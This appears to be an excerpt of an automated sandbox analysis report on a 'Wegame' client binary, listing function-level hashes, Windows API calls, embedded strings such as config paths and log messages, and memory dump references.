                                                                • Opcode Fuzzy Hash: 09eddb0c18035e9ba4e8abe9c0e0bbd46b3eeeafddf564d88c139a46cceda1a8
                                                                • Instruction Fuzzy Hash: 56518070D042AADBDB11DFB4C58479DFFB0BF02328F14429DC165AB692CB38A984DB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD38423
                                                                  • Part of subcall function 6BD37B2E: UnmapViewOfFile.KERNEL32(?,?,?,6BD37389,1F5A0D44,?,?,00000000,6BF7BCF1,000000FF,?,6BD371F1,?,?,?,6BF7BC14), ref: 6BD37B42
                                                                  • Part of subcall function 6BD37B2E: CloseHandle.KERNEL32(?,?,6BD37389,1F5A0D44,?,?,00000000,6BF7BCF1,000000FF,?,6BD371F1,?,?,?,6BF7BC14,000000FF), ref: 6BD37B4B
                                                                  • Part of subcall function 6BD37B2E: CloseHandle.KERNEL32(000000FF), ref: 6BD37B5D
                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,0000002C), ref: 6BD38449
                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,003000A2,00000000,00000000), ref: 6BD384A7
                                                                • MapViewOfFile.KERNEL32(00000000,00000007,00000000,00000000,003000A2), ref: 6BD384B8
                                                                • _memcpy_s.PGOCR ref: 6BD384FA
                                                                • _memcpy_s.PGOCR ref: 6BD38530
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleView_memcpy_s$H_prolog3_MappingUnmap
                                                                • String ID:
                                                                • API String ID: 998036934-0
                                                                • Opcode ID: 1343a469436bc015357746a13c29223dce927d1980980d99eb6892c732c0a557
                                                                • Instruction ID: a6cf387fa2153ac724126877d0b7a663f3f6b8a971042f265a3ba2f009e0079e
                                                                • Opcode Fuzzy Hash: 1343a469436bc015357746a13c29223dce927d1980980d99eb6892c732c0a557
                                                                • Instruction Fuzzy Hash: 4331A2B1901704EFEB24EFB4CD41FAEBB79EF05324F104669E126AB1D1D775AA048B60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3834B
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000010,6BD3233D), ref: 6BD38365
                                                                • EnterCriticalSection.KERNEL32(?), ref: 6BD3837D
                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 6BD38395
                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 6BD383B8
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BD383F9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ObjectSingleWait$CriticalSection$EnterH_prolog3Leave
                                                                • String ID:
                                                                • API String ID: 2592546008-0
                                                                • Opcode ID: 0544c41cfa1aad0c252d2cac7e06b307af88dc6410c8c64fb0447dee4223609e
                                                                • Instruction ID: 529345b88ea96f0e0ad2378bab6b57cac1855dc05e67512b062635e5d3a17762
                                                                • Opcode Fuzzy Hash: 0544c41cfa1aad0c252d2cac7e06b307af88dc6410c8c64fb0447dee4223609e
                                                                • Instruction Fuzzy Hash: 68213D71D0462BEFCB00DFA4CD85AAEBB74BF06324F204164D521E7291D739A656DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000000,00000000), ref: 6BDB4B7D
                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6BDB4B9B
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BDB4BA8
                                                                • ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 6BDB4BCE
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 6BDB4BD5
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 6BDB4BE3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseFileVirtual$AllocChangeCreateFindFreeHandleNotificationRead
                                                                • String ID:
                                                                • API String ID: 3913859839-0
                                                                • Opcode ID: 42d787213548c822b2265c3f1db50f6556d43c575f22a7f6a59b9a0a93de72c3
                                                                • Instruction ID: 3f27f0b01acb8adc2c7f46d133886dd038ea0df196f2d582b6a4a491886a88f9
                                                                • Opcode Fuzzy Hash: 42d787213548c822b2265c3f1db50f6556d43c575f22a7f6a59b9a0a93de72c3
                                                                • Instruction Fuzzy Hash: 6B01F9752D4304BBEB119B18CC89F5B376CEB86BA5F200050FB01AE180C778E8468F79
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0046A113
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: ClientConf$Version$VersionData$VersionUpdateData
                                                                • API String ID: 356670603-449731932
                                                                • Opcode ID: 0cdd40965c03e4a8c38d2c62c560b509d0561b6d10694df48afbfcdda1cbe438
                                                                • Instruction ID: cbd8ef31e308a701159e088c47d16078411cb8f869c0bc736888bec5b6dfc327
                                                                • Opcode Fuzzy Hash: 0cdd40965c03e4a8c38d2c62c560b509d0561b6d10694df48afbfcdda1cbe438
                                                                • Instruction Fuzzy Hash: 79C1D671C04248EADB15DBA5C945BDEBBB8EF15304F20819EE051B3192EF7C5B88CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD38B63
                                                                  • Part of subcall function 6BD130A0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(1F5A0D44,?), ref: 6BD130E3
                                                                  • Part of subcall function 6BD130A0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,1F5A0D44,?), ref: 6BD13101
                                                                  • Part of subcall function 6BD130A0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 6BD1312B
                                                                  • Part of subcall function 6BD13BC0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(1F5A0D44,?,00000001), ref: 6BD13C9D
                                                                  • Part of subcall function 6BD13BC0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000), ref: 6BD13DB6
                                                                  • Part of subcall function 6BD13BC0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 6BD13DC3
                                                                  • Part of subcall function 6BD3B8E5: __EH_prolog3.LIBCMT ref: 6BD3B8EC
                                                                  • Part of subcall function 6BD3B8E5: __alldvrm.LIBCMT ref: 6BD3B982
                                                                  • Part of subcall function 6BD3368B: __EH_prolog3.LIBCMT ref: 6BD33692
                                                                  • Part of subcall function 6BD13BC0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,00000001,1F5A0D44,?,00000001), ref: 6BD13CFD
                                                                  • Part of subcall function 6BD13BC0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140 ref: 6BD13DD1
                                                                  • Part of subcall function 6BD13BC0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,00000001,1F5A0D44,?,00000001), ref: 6BD13D26
                                                                  • Part of subcall function 6BD13BC0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 6BD13D52
                                                                  • Part of subcall function 6BD37E09: __EH_prolog3_GS.LIBCMT ref: 6BD37E10
                                                                • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(?,?,00000000,00000000,?,?,?,?,?,?,?,?,6BD36C98,00000000,00000000), ref: 6BD38CF5
                                                                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,6BD36C98,00000000,00000000), ref: 6BD38CFE
                                                                Strings
                                                                • LOG format: [YYYY-MM-DD hh:mm:ss.xxx][tid][LEVEL][FILE(LINE)]FUNCTIONmessage, xrefs: 6BD38BE5
                                                                • log created at: , xrefs: 6BD38BD1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$V12@$?flush@?$basic_ostream@?sputc@?$basic_streambuf@H_prolog3$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_H_prolog3_H_prolog3_catch_Osfx@?$basic_ostream@V?$basic_streambuf@__alldvrm
                                                                • String ID: LOG format: [YYYY-MM-DD hh:mm:ss.xxx][tid][LEVEL][FILE(LINE)]FUNCTIONmessage$log created at:
                                                                • API String ID: 3604644337-2265546226
                                                                • Opcode ID: 2aa8d483e36078a4c509a9981eef5a953b90c1dd6c7ed275c988f7a55e4e659e
                                                                • Instruction ID: 382541c000f45c53d6d68f76af04b14c353b4abf55a90e4d90afb7ff9e89f471
                                                                • Opcode Fuzzy Hash: 2aa8d483e36078a4c509a9981eef5a953b90c1dd6c7ed275c988f7a55e4e659e
                                                                • Instruction Fuzzy Hash: 0851BF71C04258EFDB15CBF8C946BDDBBB8AF16328F644098D001AB291DB796B08CB71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,1F5A0D44,?,?,00000000,?,?,6BF92740,000000FF,?,6BDD1FDE,?,?), ref: 6BDD2056
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                  • Part of subcall function 6BD447CC: __EH_prolog3.LIBCMT ref: 6BD447D3
                                                                  • Part of subcall function 6BDCF356: __EH_prolog3.LIBCMT ref: 6BDCF35D
                                                                  • Part of subcall function 6BDCF356: ?unsetf@ios_base@std@@QAEXH@Z.MSVCP140(00000001,00000018,6BDD1ACE,?,00000000,00000020,00000040,00000001,?,\mmog_data.xml,00000000,1F5A0D44,00000000,00000000,6BD43A1D), ref: 6BDCF380
                                                                  • Part of subcall function 6BDCF356: ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,00000000,00000001,?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3B6
                                                                  • Part of subcall function 6BDCF356: ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3C7
                                                                  • Part of subcall function 6BDCF409: __EH_prolog3.LIBCMT ref: 6BDCF410
                                                                  • Part of subcall function 6BDD217D: __EH_prolog3_GS.LIBCMT ref: 6BDD2184
                                                                  • Part of subcall function 6BDD217D: _CxxThrowException.VCRUNTIME140(?,6C05A770,parent node is null), ref: 6BDD2225
                                                                  • Part of subcall function 6BDD217D: __EH_prolog3_GS.LIBCMT ref: 6BDD2235
                                                                  • Part of subcall function 6BDD217D: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD22F7
                                                                  • Part of subcall function 6BDD217D: ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2306
                                                                  • Part of subcall function 6BDD217D: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2318
                                                                  • Part of subcall function 6BDD217D: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2375
                                                                  • Part of subcall function 6BDD217D: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2384
                                                                  • Part of subcall function 6BDD217D: ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C05A770,parent node is null), ref: 6BDD2393
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: V123@$?parent_path@path@filesystem@ierd_tgp@@H_prolog3H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?wstring@path@filesystem@ierd_tgp@@W@2@@std@@$?bad@ios_base@std@@?fail@ios_base@std@@?filename@path@filesystem@ierd_tgp@@?u8to16@common@ierd_tgp@@?unsetf@ios_base@std@@D@2@@std@@D@std@@ExceptionThrowU?$char_traits@V?$allocator@V?$basic_string@W@2@@4@@
                                                                • String ID: ClientConf$Version$VersionData$VersionUpdateData
                                                                • API String ID: 2273524157-449731932
                                                                • Opcode ID: 3e1194a2d3d58b617c8fb2522a013e128352ef816f1ff80dde319ffc8994a66a
                                                                • Instruction ID: c45a1a2be7c75cd69db863383cd93ce1d8c46adcf6e52f728edd2f0a4d2a07a1
                                                                • Opcode Fuzzy Hash: 3e1194a2d3d58b617c8fb2522a013e128352ef816f1ff80dde319ffc8994a66a
                                                                • Instruction Fuzzy Hash: 68416D71D04248EADB05DBB9D845FDEBBB8EF18318F1080ADE145AB290DB796B44CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00453FDC
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,00000008,00000000,0000006C,00000000,bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453FFB
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00454007
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\inc\cfg_file.h, xrefs: 0045402B
                                                                • [gl]Get cfg failed. path:%s, xrefs: 0045404B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@H_prolog3$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_H_prolog3_catch_Logger@1@U?$less@V12@V?$basic_ptree@
                                                                • String ID: [gl]Get cfg failed. path:%s$e:\dailybuild_dev\wegame_client\codes\common\inc\cfg_file.h
                                                                • API String ID: 1555206004-1591787546
                                                                • Opcode ID: 28f5714ea3f8e257c529b5b8e965e669c3b8b513a0c18cde655975f1ecb6811f
                                                                • Instruction ID: 954c1160aca5fd1ce00b1aec04121a396aa14778c07685900a847669182918fb
                                                                • Opcode Fuzzy Hash: 28f5714ea3f8e257c529b5b8e965e669c3b8b513a0c18cde655975f1ecb6811f
                                                                • Instruction Fuzzy Hash: 63219231D00108ABDF15EFA5C851ADE7774AF14748F60815EF8527B282EB789E09CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD45F6D
                                                                • ?GetWeGameAppDataPathW@Sys_wrapper@common@ierd_tgp@@SA_NAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,6BFA11FC), ref: 6BD45FBE
                                                                  • Part of subcall function 6BDB2A44: __EH_prolog3_GS.LIBCMT ref: 6BDB2A4E
                                                                  • Part of subcall function 6BDB2A44: memset.VCRUNTIME140(?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A65
                                                                  • Part of subcall function 6BDB2A44: memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A77
                                                                  • Part of subcall function 6BDB2A44: SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BDB2A8E
                                                                  • Part of subcall function 6BDB2A44: ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6BDB2ACE
                                                                  • Part of subcall function 6BDB2A44: swprintf.LIBCMT ref: 6BDB2B29
                                                                  • Part of subcall function 6BDB2A44: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000), ref: 6BDB2B67
                                                                  • Part of subcall function 6BDB2A44: ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?), ref: 6BDB2B79
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(6BFA11FC), ref: 6BD45FE7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6BD4600B
                                                                • appdata_project_folder failed, xrefs: 6BD4601F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: PathSys_wrapper@common@ierd_tgp@@memset$?create_directory_ex@?exists@filesystem@ierd_tgp@@?get_client_version_type@overseas@ierd_tgp@@?get_log_instance@base@@DataFolderGameH_prolog3_H_prolog3_catch_Logger@1@U?$char_traits@_V?$allocator@_V?$basic_string@_Verror_code@std@@@Vpath@12@Vpath@filesystem@3@@W@2@@std@@@W@std@@swprintf
                                                                • String ID: appdata_project_folder failed$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp
                                                                • API String ID: 1782788727-3324992569
                                                                • Opcode ID: 64c426f2e22bc15cadf52ad0ba2529f0a00e5616faa9a862473627040bdf184e
                                                                • Instruction ID: 1576e5f1b1befbb1e063311c517b974fe5fa09b3d93f97c43c1083ab3d2f3dbe
                                                                • Opcode Fuzzy Hash: 64c426f2e22bc15cadf52ad0ba2529f0a00e5616faa9a862473627040bdf184e
                                                                • Instruction Fuzzy Hash: 5C21AE71905208DADB14CFB8C891BCCBBB06F04318F6080ADD645BF291DB7D9B09DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD571B5
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                • ?is_profile_on@common@ierd_tgp@@YA_NXZ.COMMON(00000040), ref: 6BD571CA
                                                                • ?enable_profile_on@common@ierd_tgp@@YAX_N@Z.COMMON(?), ref: 6BD57246
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,?,?,?,initial.profile.on,00000012,00000040), ref: 6BD57209
                                                                  • Part of subcall function 6BD4702B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                  • Part of subcall function 6BD4702B: ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$?enable_profile_on@common@ierd_tgp@@?get_cfg_by_path@common@ierd_tgp@@?is_profile_on@common@ierd_tgp@@?split_path@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3H_prolog3_H_prolog3_catch_U?$less@V12@V34@1@V?$basic_ptree@memmove
                                                                • String ID: initial.profile.on
                                                                • API String ID: 2365034594-3868740645
